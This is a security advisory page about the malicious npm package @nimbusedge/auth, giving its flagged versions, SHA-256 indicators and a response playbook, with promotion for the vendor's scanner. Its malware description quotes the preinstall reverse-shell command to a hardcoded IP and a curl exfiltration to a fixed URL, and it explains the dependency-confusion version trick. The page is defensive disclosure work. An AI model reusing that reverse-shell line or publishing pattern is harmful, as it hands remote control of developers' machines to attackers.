Your RSA-2048 keys break in 2030. Find every one of them before attackers do.
Malicious package

@nimbusedge/authnpm

@nimbusedge/auth is a confirmed malicious npm package (MAL-2026-16132) that steals credentials and exfiltrates sensitive data (malicious versions 221.1.0, 19999.0.1, 19999.0.2…). Do not install it — remove it immediately and rotate any exposed credentials.

Malicious code in @nimbusedge/auth (npm)

MAL-2026-16132
Immediate action
Remove the package, then rotate any secrets the build/runtime could reach.
npm uninstall @nimbusedge/auth

What this malware does

package.json declares a preinstall lifecycle script that runs bash -i >& /dev/tcp/147.93.157.202/8080 to open an interactive reverse shell to the hardcoded host 147.93.157.202 on port 8080, and pipes the shell session over plain HTTP to http://canarytokens.com/terms/7dc94zmd3so67n5vbz5bxmt7v/contact.php via curl -X POST --data-binary @-. The script executes automatically on npm install, giving the remote endpoint interactive command execution on the installer's machine and beaconing session output to the hardcoded URL. The package is published under the scoped name @nimbusedge/auth at version 19999.0.6 — an artificially inflated version consistent with the dependency-confusion resolution pattern, causing internal resolvers configured against the public registry to fetch this artifact in place of a private package of the same name. The mechanism is identical to install-time remote code execution and data exfiltration regardless of any self-labeling in the package metadata.

Malicious versions

40 flagged
221.1.019999.0.119999.0.219999.0.319999.0.419999.0.519999.0.619999.0.719999.1337.119999.1337.219999.1337.419999.1337.519999.1337.619999.1337.719999.1337.819999.1338.119999.1338.219999.1338.319999.1338.419999.1338.519999.1338.619999.1338.719999.1338.819999.1339.119999.1339.219999.1339.319999.1339.419999.1339.519999.1349.519999.1359.119999.1359.219999.1359.319999.1359.419999.1359.519999.1359.619999.1360.119999.1360.219999.1360.319999.1360.419999.1360.5

Indicators of compromise (SHA-256)

0f0bb20283bd40a59feb82766057c8e98edc873f0bfc2bbaa454339bc6c89c2d
7b14983d3d46fcffbf8c1fbad971d98662330efa1413e31e97c7de943a54f0e4
b0398f99aca1969ceee2632006edc4d324e0516b1e627b0a32b09013717ff1b9
324a31c007d792bb911c1fd74a67f74b2878ca232bae780a8e7acb912ec28db0
4b762f73794267d3821408da0200dc64e27ce29a9970ac861504c1c2ac7fd62c
5c597c5e6d57a72bf3783f6b3d46b983d8577cbadc48a06fcfa0659c348001a9
853558ad92f4ec2f9930981b2276ab8faad3fb5f1ba9e6a29dfe0e5c035057ef
ac6c00f6dc2124468b8156b9ceca71890c762fc2c19620a6de67ea0b36afbfd3
b01f48b206d7698522815281d87a3c380cf4082420dd15a4de6e2aae623edc3b
d1a82ac5375da171566e3e750fa4445edae82dc409b048a16f14098042f686ce
d9e5b0b6241af6935a6c4f781934ea9059000cb93bf28a48449132e429f4613a
30652cef6105a2c4877f440b9a95fb973ee85efb1d38a57358fb94e2fcde1b63
4826bdd8b6d9b4987a09337704b464059d53badfe3b1c7671d582aea8f6b40f2
9177bbdd2e74bde02414abef9051bd54cd508eb69eec3347adabc4758cb70fc5
a2e8d6814dd637a8927342f47828fcda377aa999ef400868bd4b7eb169eb9b5a
a2ec45ed03cdff93ba2973154358d55372c5c3b67fbe52d7b5b39fe77b8cc936
f824bcdc8aa0893373ad3e3ae1f6ed01311672c8106e0346881b4785a0342f1b
6000241095d57a4914b76a0b7fec0d4c4fc5c8b74db0d5972432948f1b162f63
afc290a2e8aacd5a20af3208707f9f32b462454ff75f4fa255831d83df36af07
d2deba215f40aae214e850cfcf784506392d7f1a8208e6233d32f0be4f5f4a97
2856142af2c8fd7d4e67adc2c75c3147cb70051327ea5446725d74827f9f6ee9
38afcbc836ed5dd03c6718895106f0e72300a1310bb68442ee8afc9ce70e259a
99c35d38f6d9d7657a647e168297a9c87c6da4221ef5d0a9ad0bcc528c9cff5a
be1173da1957e07ff521d9ef886309b67aef47e14aa8431647b7bf1abe5afd60
110a786757cf3a1acaf37496c565f391c0c9b50077b1ce8690e5800ff62d6e33
1204d8fa3ac4200cc68b1d340e387a999ea22fe2e5e0df4dceeda009ba375375
3ac718bb6440a9b1628abd22d6b0add478e11da70632a1c844926bdef98ebb73
553b6cc69be50c17cf94451289592a2a31999aaccd44251864090b7ab1f9474e
5c3e44480a4652fa6ddc776a7cec89a90db9b490bc8bb3583734da1d91a7b705
97c61d0debee1d9391fc673576fc6292e26e22e5627f4cd9e3555d00acb9d808
e87d8d62d906ee35f0984e455d2c4a044ceb760a9bafab7e3fced8a7a75cf810
48162864236ba12ada9b9384d64d63c49efa7aec55757d9b784a1877a6eade64
4b3bc7282aad2d14257c112647e674b69069ced2dce44df0c7fc8e932ec29fc1
f49613a9a00f82ac4b1c2f3987f2114febc177642b78e6ad71a388c649f9bafc
fd1faf2402b6e837df297ba0e49bc97e10b72a507e71ce9133c63c25cf1ae780
273dbcb1fb6283bedc49e856fa33eb70215fcadc69320f681e8e1abe7a0b0ab0
584302c5da59df05ff54273e32719c5569946d99f45ad2283a1a203d3ce598c4
a1c515f5cb3bfa2c20dc4fa78c4be6865209e833016cd5804b94ba5f3d1d5885
a23bacf4d0264e0ae72e14b20c5ee3f14466580e4ff8321dde7ff67b3cf223f9
c7a691d65630e05013b3561a30a054392f434588f2cf21908c5bb97a017b51e3

Detection & response playbook

Credential / info stealer
  1. Find it

    Scan your lockfiles (package-lock.json, pnpm-lock.yaml, yarn.lock, requirements.txt, poetry.lock, etc.) and build artifacts for @nimbusedge/auth (40 malicious versions). O3 Security's supply-chain scanner checks every dependency against known-malicious package intelligence at install time and in CI, flagging @nimbusedge/auth across your stack and pipelines.

  2. If you installed it — respond

    @nimbusedge/auth is built to steal secrets, so assume every credential the build or runtime could read is compromised. Remove it from your project and lockfile, then rotate ALL exposed secrets — npm/registry tokens, cloud keys, CI/CD secrets, SSH keys, and any .env values — from a known-clean machine. Audit logs for unauthorized use of those credentials.

  3. Did it already run?

    If @nimbusedge/auth was ever installed, its post-install/runtime payload may have already executed. O3's L7 egress monitoring and runtime eBPF sensors detect the credential exfiltration or command-and-control callback after install and block the malicious outbound channel, so you catch and contain the actual compromise — not just the presence of the package.

  4. How O3 protects you

    O3 blocks @nimbusedge/auth before install through its supply-chain scanner, and if it has already run, detects and severs the exfiltration or C2 callback at runtime through L7 egress monitoring and eBPF.

Frequently asked questions

No. @nimbusedge/auth on npm has been identified as a malicious package (versions 221.1.0, 19999.0.1, 19999.0.2, 19999.0.3, 19999.0.4, 19999.0.5, 19999.0.6, 19999.0.7, and 32 more flagged). It should be removed immediately — do not install or keep it in your dependency tree.

Campaign

IN-MAL-2026-019976IN-MAL-2026-019986IN-MAL-2026-019967IN-MAL-2026-019990IN-MAL-2026-019954IN-MAL-2026-019965IN-MAL-2026-019977IN-MAL-2026-019960IN-MAL-2026-019983IN-MAL-2026-019968IN-MAL-2026-019961IN-MAL-2026-019957IN-MAL-2026-019980IN-MAL-2026-019979IN-MAL-2026-019964IN-MAL-2026-019991IN-MAL-2026-019972IN-MAL-2026-019956IN-MAL-2026-019962IN-MAL-2026-019963IN-MAL-2026-019975IN-MAL-2026-019987IN-MAL-2026-019973IN-MAL-2026-019988IN-MAL-2026-019971IN-MAL-2026-019958IN-MAL-2026-019982IN-MAL-2026-019969IN-MAL-2026-019981IN-MAL-2026-019978IN-MAL-2026-019955IN-MAL-2026-019974IN-MAL-2026-019970IN-MAL-2026-019966IN-MAL-2026-019992IN-MAL-2026-019959IN-MAL-2026-019999IN-MAL-2026-019984IN-MAL-2026-019989IN-MAL-2026-019985

References

Credits

  • Amazon Inspector · finder

Detect & block this

O3 blocks @nimbusedge/auth-class packages before install and in CI — and if it already ran, its runtime egress monitoring catches the credential exfiltration and severs the channel.

Explore

@nimbusedge/auth (npm) malicious package — MAL-2026-16132 | O3 Security